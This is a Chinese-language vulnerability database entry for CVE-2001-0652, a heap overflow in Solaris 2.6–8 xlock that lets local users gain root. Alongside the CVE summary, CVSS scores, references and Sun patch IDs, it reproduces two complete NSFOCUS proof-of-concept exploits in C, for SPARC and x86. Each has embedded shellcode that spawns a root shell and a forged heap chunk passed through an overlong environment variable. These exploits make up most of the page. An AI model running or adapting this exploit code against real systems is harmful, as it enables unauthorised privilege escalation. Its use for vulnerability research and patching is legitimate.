CVE-2001-0652
CVSS7.2
发布时间 :2001-10-30 00:00:00
修订时间 :2016-10-17 22:11:37
NMCOE    

[原文]Heap overflow in xlock in Solaris 2.6 through 8 allows local users to gain root privileges via a long (1) XFILESEARCHPATH or (2) XUSERFILESEARCHPATH environmental variable.


[CNNVD]Solaris xlock堆溢出漏洞(CNNVD-200110-126)

        Solaris 2.6版本到8版本的xlock存在堆溢出漏洞。本地用户可以借助超长(1)XFILESEARCHPATH或(2)XUSERFILESEARCHPATH环境变量提升根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:131Heap Overflow in Solaris 7 xlock
oval:org.mitre.oval:def:10Heap Overflow in Solaris 8 xlock
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0652
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0652
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-126
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=99745571104126&w=2
(UNKNOWN)  BUGTRAQ  20010810 NSFOCUS SA2001-05 : Solaris Xlock Heap Overflow Vulnerability
http://www.securityfocus.com/bid/3160
(UNKNOWN)  BID  3160
http://xforce.iss.net/static/6967.php
(UNKNOWN)  XF  solaris-xlock-bo(6967)

- 漏洞信息

Solaris xlock堆溢出漏洞
高危 缓冲区溢出
2001-10-30 00:00:00 2005-05-02 00:00:00
本地  
        Solaris 2.6版本到8版本的xlock存在堆溢出漏洞。本地用户可以借助超长(1)XFILESEARCHPATH或(2)XUSERFILESEARCHPATH环境变量提升根特权。

- 公告与补丁

        Sun has provided the patch IDs that the forthcoming fixes have been assigned. This record will be updated when the fixes are actually available for download.
        Sun Solaris 8_x86
        

  •         Sun 108653-33
            

  •         

        Sun Solaris 8
        

  •         Sun 108652-38
            

  •         

        Sun Solaris 2.6
        

  •         Sun 105633-60
            

  •         

        Sun Solaris 2.6 _x86
        

  •         Sun 106248-45
            

  •         

        Sun Solaris 7.0 _x86
        

  •         Sun 108377-26
            

  •         

        Sun Solaris 7.0
        

  •         Sun 108376-30
            

  •         

- 漏洞信息 (21058)

Solaris 2.6/7/8 SPARC xlock Heap Overflow Vulnerability (EDBID:21058)
solaris local
2001-08-10 Verified
0 Nsfocus
N/A [点击下载]
source: http://www.securityfocus.com/bid/3160/info

Xlock is a utility for locking X-windows displays. It is installed setuid root because it uses the user's password to authorize access to the display when it is locked.

The version of xlock that ships with Solaris as part of OpenWindows contains a heap overflow in it's handling of an environment variable.

Local attackers may be able to execute arbitrary code with effective privileges of xlock. 

/*
 *  sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
 *  Copyright (c) 2001 - Nsfocus.com
 *
 *  Tested in Solaris 2.6/7/8 SPARC
 *
 *  DISCLAIMS:
 *  This  is a proof of concept code.  This code is for test purpose 
 *  only and should not be run against any host without permission from 
 *  the system administrator.
 * 
 *  NSFOCUS Security Team <security@nsfocus.com>
 *  http://www.nsfocus.com
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <sys/systeminfo.h>

#define RETLOC  0xffbee8c4  /* default "return address" location (Solaris 7) */
#define SP      0xffbefffc  /* default "bottom" stack address (Solaris 7/8) */

#define VULPROG "/usr/openwin/bin/xlock"

#define NOP     0xaa1d4015      /* "xor %l5, %l5, %l5" */


char            shellcode[] =           /* from scz's shellcode for SPARC */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\xaa\x1d\x40\x15"  
"\x81\xc3\xe0\x14\xaa\x1d\x40\x15\xaa\x1d\x40\x15\x90\x08\x3f\xff"
"\x82\x10\x20\x8d\x91\xd0\x20\x08\x90\x08\x3f\xff\x82\x10\x20\x17"
"\x91\xd0\x20\x08\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65"
"\x20\x80\x3a\x29\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34"
"\x92\x0b\x80\x0e\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\xc0\x2a\x20\x07\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f"
"\x82\x10\x20\x01\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack point address */
long
get_sp(void)
{
        __asm__("mov %sp,%i0");
}

long 
get_shelladdr(long sp_addr, char **arg, char **env)
{
        long            retaddr;
        int             i;
        char            plat[256];
        char            pad = 0, pad1;
        int             env_len, arg_len, len;


        /* calculate the length of "VULPROG" + argv[] */
        for (i = 0, arg_len = 0; arg[i]!=NULL ; i++) {
                arg_len += strlen(arg[i]) + 1;
        }

        
        /* calculate the pad nummber . */
        pad = 3 - arg_len % 4;
        printf("shellcode address padding = %d\n", pad);

        memset(env[0], 'A', pad);
        env[0][pad] = '\0';

                /* get environ length */
        for (i = 0, env_len = 0; env[i]!=NULL; i++) {
                env_len += strlen(env[i]) + 1;
        }

        /* get platform info  */
        sysinfo(SI_PLATFORM, plat, 256);

        len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1;
        printf("stack arguments len = %#x(%d)\n", len, len);

        pad1 = len % 4;

        if(pad1 == 3 ) pad1 = 5;
        else pad1 = 4 - pad1;

        printf("the padding zeros number = %d\n\n", pad1);

        /* get the exact shellcode address */
        retaddr = sp_addr - pad1       /* the trailing zero number */
                          - strlen(VULPROG) - 1 
                          - strlen(plat) - 1 ;

        for(i--;i>0;i--) retaddr -= strlen(env[i]) + 1;                

        printf("Using RET address = 0x%x\n", retaddr);
        return retaddr;

} /* End of get_shelladdr */


int 
main(int argc, char **argv)
{
        char            buf[2048], fake_chunk[48];
        long            retaddr, sp_addr = SP;
        char           *arg[24], *env[24];
        char            padding[64];
        long            retloc = RETLOC;
        unsigned int   *ptr;
        char            ev1[]="XUSERFILESEARCHPATH=";
        long            ev1_len;
        long            overbuflen = 1024;

        if (argc > 1) /* you need adjust retloc offset in your system */
                retloc += atoi(argv[1]);

        arg[0] = VULPROG;
        arg[1] = NULL;

        bzero(buf, sizeof(buf));
        ev1_len = strlen(ev1);
        memcpy(buf, ev1, ev1_len);
        memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));
        
        env[0] = padding;       /* put padding buffer in env */
        env[1] = shellcode;     /* put shellcode in env */
        env[2] = buf;           /* put overflow environ */    
        env[3] = NULL;          /* end of env */

        /* get stack "bottom" address */
        if(((unsigned char) (get_sp() >> 24)) == 0xef) { /* Solaris 2.6 */
          sp_addr = SP - 0x0fbf0000; 
          retloc -= 0x0fbf0000;
        }

        retaddr = get_shelladdr(sp_addr, arg, env);
        printf("Using retloc = 0x%x \n", retloc);
        
        memset(fake_chunk, '\xff', sizeof(fake_chunk));
        ptr = (unsigned int *) fake_chunk;
        *(ptr + 0) = 0xfffffff9;
        *(ptr + 2) = retaddr - 8;
        *(ptr + 8) = retloc - 8;

        memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));

        execve(VULPROG, arg, env);
        perror("execle");
}  /* End of main */		

- 漏洞信息 (21059)

Solaris 8 x86 xlock Heap Overflow Vulnerability (EDBID:21059)
solaris local
2001-08-10 Verified
0 Nsfocus
N/A [点击下载]
source: http://www.securityfocus.com/bid/3160/info
 
Xlock is a utility for locking X-windows displays. It is installed setuid root because it uses the user's password to authorize access to the display when it is locked.
 
The version of xlock that ships with Solaris as part of OpenWindows contains a heap overflow in it's handling of an environment variable.
 
Local attackers may be able to execute arbitrary code with effective privileges of xlock. 

/*
 *  sol_x86_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
 *  Copyright (c) 2001 - Nsfocus.com
 *
 *  Tested in Solaris 8 x86.
 *
 *  DISCLAIMS:
 *  This  is a proof of concept code.  This code is for test purpose 
 *  only and should not be run against any host without permission from 
 *  the system administrator.
 * 
 *  NSFOCUS Security Team <security@nsfocus.com>
 *  http://www.nsfocus.com
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/types.h>

#define RETLOC  0x080463c8  /* default retrun address location (Solaris 8 x86) */
#define SP      0x08047ffc  /* default "bottom" stack address (Solaris 8 x86) */

#define VULPROG "/usr/openwin/bin/xlock"

char            shellcode[] =           
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\xeb\x28\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x83\xec\x64\x33\xd2\xc6\x45\xce\x9a\x89"
"\x55\xcf\x89\x55\xd3\xc6\x45\xd3\x07\xc6\x45\xd5"
"\xc3\x89\x55\xfc\x83\xed\x32\x33\xc0\x50\x50\xb0"
"\xca\xff\xd5\x83\xc4\x08\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
"\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

int 
main(int argc, char **argv)
{
        char            buf[2048], fake_chunk[48];
        long            retaddr, sp_addr = SP;
        char           *arg[24], *env[24];
        long            retloc = RETLOC;
        unsigned int   *ptr;
        char            ev1[]="XUSERFILESEARCHPATH=";
        long            ev1_len;
        long            overbuflen = 1024;        

        if (argc > 1) /* adjust retloc */
                retloc += atoi(argv[1]);

        bzero(buf, sizeof(buf));
        ev1_len = strlen(ev1);
        memcpy(buf, ev1, ev1_len);
        memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));

        arg[0] = VULPROG;
        arg[1] = NULL;

        env[0] = shellcode;     /* put shellcode in env */
        env[1] = buf;           /* put overflow environ */
        env[2] = NULL;          /* end of env */
        
        /* get the not exact shellcode address :) */
        retaddr = sp_addr - strlen(VULPROG) - 1
                          - strlen("i86pc") - 1 
                          - strlen(buf) - 1
                          - strlen(shellcode) - 1;

        printf("Using RET address = 0x%lx\n", retaddr);
        printf("Using retloc = 0x%lx \n", retloc);

        ptr = (unsigned int *) fake_chunk;
        memset(fake_chunk, '\xff', sizeof(fake_chunk));
        *(ptr + 0) = 0xfffffff9;
        *(ptr + 2) = retaddr;
        *(ptr + 8) = retloc - 8;

        memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));

        execve(VULPROG, arg, env);
        perror("execle");
        return(1);
}  /* End of main */		

- 漏洞信息

1924
Solaris xlock Multiple Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-08-10 Unknow
2001-08-10 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站